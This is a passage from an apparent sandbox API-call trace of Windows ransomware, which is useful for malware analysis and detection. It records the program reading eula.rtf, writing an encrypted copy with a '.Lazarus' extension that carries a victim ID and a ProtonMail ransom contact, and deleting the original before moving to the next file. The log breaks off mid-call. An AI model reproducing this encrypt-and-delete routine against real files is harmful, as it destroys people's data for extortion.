[0061.820] AreFileApisANSI () returned 1 [0061.820] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e0a0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 36 [0061.820] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x48) returned 0x68f40 [0061.820] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e0a0, cbMultiByte=-1, lpWideCharStr=0x68f40, cchWideChar=36 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1030\\eula.rtf") returned 36 [0061.820] GetFileAttributesExW (in: lpFileName="C:\\588bce7c90097ed212\\1030\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1030\\eula.rtf"), fInfoLevelId=0x0, lpFileInformation=0x327f738 | out: lpFileInformation=0x327f738*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0xcf2)) returned 1 [0061.820] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68f40 | out: hHeap=0x20000) returned 1 [0061.820] AreFileApisANSI () returned 1 [0061.820] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x327f560, cbMultiByte=-1, lpWideCharStr=0x327f578, cchWideChar=260 | out: lpWideCharStr=".Lazarus") returned 9 [0061.820] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88810 [0061.820] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0061.820] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0061.820] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0061.820] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88810 | out: hHeap=0x20000) returned 1 [0061.820] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0061.820] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0061.820] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0061.820] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e180 [0061.820] GetLastError () returned 0x0 [0061.820] SetLastError (dwErrCode=0x0) [0061.820] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x2c) returned 0x4df18 [0061.820] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x120c) returned 0x84fb8 [0061.820] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x103) returned 0x8b798 [0061.820] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d618 [0061.820] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d630 [0061.820] GetLastError () returned 0x0 [0061.821] SetLastError (dwErrCode=0x0) [0061.821] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0061.821] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de70 [0061.821] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x47) returned 0x69350 [0061.821] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de70 | out: hHeap=0x20000) returned 1 [0061.821] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6a) returned 0x75fa8 [0061.821] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69350 | out: hHeap=0x20000) returned 1 [0061.821] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0061.821] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0061.821] AreFileApisANSI () returned 1 [0061.821] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x75fa8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 98 [0061.821] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xc4) returned 0x51398 [0061.821] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x75fa8, cbMultiByte=-1, lpWideCharStr=0x51398, cchWideChar=98 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1030\\eula.rtf.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus") returned 98 [0061.821] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1030\\eula.rtf.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus" (normalized: "c:\\588bce7c90097ed212\\1030\\eula.rtf.[id=db2mhnyt6x][mail=decryptersupport@protonmail.com].lazarus"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0061.823] GetFileType (hFile=0x428) returned 0x1 [0061.823] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x51398 | out: hHeap=0x20000) returned 1 [0061.823] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfd0 [0061.823] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0061.824] AreFileApisANSI () returned 1 [0061.824] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e180, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 36 [0061.824] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x48) returned 0x68d60 [0061.824] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e180, cbMultiByte=-1, lpWideCharStr=0x68d60, cchWideChar=36 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1030\\eula.rtf") returned 36 [0061.824] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1030\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1030\\eula.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f1a8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x420 [0061.824] GetFileType (hFile=0x420) returned 0x1 [0061.824] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68d60 | out: hHeap=0x20000) returned 1 [0061.824] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x78) returned 0x6a5b0 [0061.824] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f6a8 [0061.824] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0061.824] GetLastError () returned 0x0 [0061.824] SetLastError (dwErrCode=0x0) [0061.824] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0061.824] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0061.824] GetLastError () returned 0x0 [0061.824] SetLastError (dwErrCode=0x0) [0061.825] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0061.825] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f088 [0061.825] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x861d0 [0061.825] ReadFile (in: hFile=0x420, lpBuffer=0x861d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f030, lpOverlapped=0x0 | out: lpBuffer=0x861d0*, lpNumberOfBytesRead=0x327f030*=0xcf2, lpOverlapped=0x0) returned 1 [0061.826] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x400) returned 0x70718 [0061.827] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d768 [0061.827] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x8d438 [0061.827] GetLastError () returned 0x0 [0061.827] SetLastError (dwErrCode=0x0) [0061.827] GetLastError () returned 0x0 [0061.827] SetLastError (dwErrCode=0x0) [0061.827] GetLastError () returned 0x0 [0061.827] SetLastError (dwErrCode=0x0) [0061.827] ReadFile (in: hFile=0x420, lpBuffer=0x861d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x861d0*, lpNumberOfBytesRead=0x327f0c4*=0x0, lpOverlapped=0x0) returned 1 [0061.827] GetLastError () returned 0x0 [0061.827] SetLastError (dwErrCode=0x0) [0061.827] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x2) returned 0x7cfa0 [0061.827] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d510 [0061.827] GetLastError () returned 0x0 [0061.827] SetLastError (dwErrCode=0x0) [0061.828] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d768 | out: hHeap=0x20000) returned 1 [0061.828] WriteFile (in: hFile=0x428, lpBuffer=0x8d438*, nNumberOfBytesToWrite=0xd00, lpNumberOfBytesWritten=0x327ef70, lpOverlapped=0x0 | out: lpBuffer=0x8d438*, lpNumberOfBytesWritten=0x327ef70*=0xd00, lpOverlapped=0x0) returned 1 [0061.829] GetLastError () returned 0x0 [0061.829] SetLastError (dwErrCode=0x0) [0061.829] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0061.829] GetLastError () returned 0x0 [0061.829] SetLastError (dwErrCode=0x0) [0061.829] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f088 | out: hHeap=0x20000) returned 1 [0061.829] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x70718 | out: hHeap=0x20000) returned 1 [0061.829] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d510 | out: hHeap=0x20000) returned 1 [0061.829] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f6a8 | out: hHeap=0x20000) returned 1 [0061.829] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a5b0 | out: hHeap=0x20000) returned 1 [0061.829] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8d438 | out: hHeap=0x20000) returned 1 [0061.830] CloseHandle (hObject=0x428) returned 1 [0061.831] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x861d0 | out: hHeap=0x20000) returned 1 [0061.831] CloseHandle (hObject=0x420) returned 1 [0061.831] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfe0 [0061.831] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d0a0 [0061.831] AreFileApisANSI () returned 1 [0061.831] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e180, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 36 [0061.831] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x48) returned 0x69210 [0061.831] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e180, cbMultiByte=-1, lpWideCharStr=0x69210, cchWideChar=36 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1030\\eula.rtf") returned 36 [0061.831] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1030\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1030\\eula.rtf"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x420 [0061.832] GetFileType (hFile=0x420) returned 0x1 [0061.832] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69210 | out: hHeap=0x20000) returned 1 [0061.832] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x861d0 [0061.832] GetLastError () returned 0xb7 [0061.832] SetLastError (dwErrCode=0xb7) [0061.833] WriteFile (in: hFile=0x420, lpBuffer=0x327de50*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x327de4c, lpOverlapped=0x0 | out: lpBuffer=0x327de50*, lpNumberOfBytesWritten=0x327de4c*=0x1, lpOverlapped=0x0) returned 1 [0061.834] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x861d0 | out: hHeap=0x20000) returned 1 [0061.834] CloseHandle (hObject=0x420) returned 1 [0061.834] AreFileApisANSI () returned 1 [0061.834] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e180, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 36 [0061.834] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x48) returned 0x68b80 [0061.834] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e180, cbMultiByte=-1, lpWideCharStr=0x68b80, cchWideChar=36 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1030\\eula.rtf") returned 36 [0061.834] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\1030\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1030\\eula.rtf")) returned 1 [0061.836] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68b80 | out: hHeap=0x20000) returned 1 [0061.836] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0061.836] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfe0 | out: hHeap=0x20000) returned 1 [0061.836] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0061.836] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfd0 | out: hHeap=0x20000) returned 1 [0061.836] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0061.836] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0061.836] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75fa8 | out: hHeap=0x20000) returned 1 [0061.836] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d630 | out: hHeap=0x20000) returned 1 [0061.836] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d618 | out: hHeap=0x20000) returned 1 [0061.836] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x84fb8 | out: hHeap=0x20000) returned 1 [0061.836] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8b798 | out: hHeap=0x20000) returned 1 [0061.836] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e180 | out: hHeap=0x20000) returned 1 [0061.836] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0061.836] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0061.836] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0061.836] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0061.836] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0a0 | out: hHeap=0x20000) returned 1 [0061.836] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.836] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.836] FindNextFileW (in: hFindFile=0x78210, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x12fb4, dwReserved0=0x1, dwReserved1=0x0, cFileName="LocalizedData.xml", cAlternateFileName="LOCALI~1.XML")) returned 1 [0061.836] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88388 [0061.836] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de70 [0061.836] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88388 | out: hHeap=0x20000) returned 1 [0061.836] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df88 [0061.836] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dff8 [0061.836] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e1f0 [0061.836] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dff8 | out: hHeap=0x20000) returned 1 [0061.836] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df88 | out: hHeap=0x20000) returned 1 [0061.836] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de70 | out: hHeap=0x20000) returned 1 [0061.836] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df88 [0061.836] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88630 | out: hHeap=0x20000) returned 1 [0061.837] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e1f0 | out: hHeap=0x20000) returned 1 [0061.837] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0061.837] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f6a8 [0061.837] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0061.837] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f6a8 | out: hHeap=0x20000) returned 1 [0061.837] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d000 [0061.837] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f6a8 [0061.837] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0061.837] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f6a8 | out: hHeap=0x20000) returned 1 [0061.837] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0061.837] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x538c8 [0061.837] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e180 [0061.837] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71bd0 [0061.837] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x538c8 | out: hHeap=0x20000) returned 1 [0061.837] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e180 | out: hHeap=0x20000) returned 1 [0061.837] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71620 [0061.837] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71bd0 | out: hHeap=0x20000) returned 1 [0061.837] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.837] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.837] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.837] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.837] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71620 | out: hHeap=0x20000) returned 1 [0061.837] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0061.837] AreFileApisANSI () returned 1 [0061.837] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\588bce7c90097ed212\\1030\\LocalizedData.xml", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\588bce7c90097ed212\\1030\\LocalizedData.xml", lpUsedDefaultChar=0x0) returned 45 [0061.837] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e1f0 [0061.837] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.837] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.837] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d0a0 [0061.837] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfe0 [0061.837] AreFileApisANSI () returned 1 [0061.837] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e1f0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 45 [0061.837] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5a) returned 0x71758 [0061.838] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e1f0, cbMultiByte=-1, lpWideCharStr=0x71758, cchWideChar=45 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1030\\LocalizedData.xml") returned 45 [0061.838] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1030\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1030\\localizeddata.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x420 [0061.838] GetFileType (hFile=0x420) returned 0x1 [0061.838] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71758 | out: hHeap=0x20000) returned 1 [0061.838] SetFilePointerEx (in: hFile=0x420, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0061.838] SetFilePointerEx (in: hFile=0x420, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0061.838] SetFilePointerEx (in: hFile=0x420, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0061.838] CloseHandle (hObject=0x420) returned 1 [0061.838] AreFileApisANSI () returned 1 [0061.838] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e1f0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 45 [0061.839] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5a) returned 0x71960 [0061.839] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e1f0, cbMultiByte=-1, lpWideCharStr=0x71960, cchWideChar=45 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1030\\LocalizedData.xml") returned 45 [0061.839] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1030\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1030\\localizeddata.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x420 [0061.839] GetFileType (hFile=0x420) returned 0x1 [0061.839] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71960 | out: hHeap=0x20000) returned 1 [0061.839] CloseHandle (hObject=0x420) returned 1 [0061.839] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e2d0 [0061.839] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e458 [0061.839] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de70 [0061.839] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0061.839] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de70 | out: hHeap=0x20000) returned 1 [0061.839] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e458 | out: hHeap=0x20000) returned 1 [0061.839] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e2d0 | out: hHeap=0x20000) returned 1 [0061.839] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0061.839] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e1b8 [0061.839] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0061.839] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0061.839] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e420 [0061.839] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0061.839] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0061.839] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e1b8 | out: hHeap=0x20000) returned 1 [0061.839] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e420 | out: hHeap=0x20000) returned 1 [0061.839] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e1b8 [0061.839] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e068 [0061.839] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3e8 [0061.839] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de70 [0061.839] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3e8 | out: hHeap=0x20000) returned 1 [0061.840] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e068 | out: hHeap=0x20000) returned 1 [0061.840] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e1b8 | out: hHeap=0x20000) returned 1 [0061.840] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0061.840] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de70 | out: hHeap=0x20000) returned 1 [0061.840] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e298 [0061.840] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0061.840] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e298 | out: hHeap=0x20000) returned 1 [0061.840] AreFileApisANSI () returned 1 [0061.840] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e1f0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 45 [0061.840] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5a) returned 0x71960 [0061.840] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e1f0, cbMultiByte=-1, 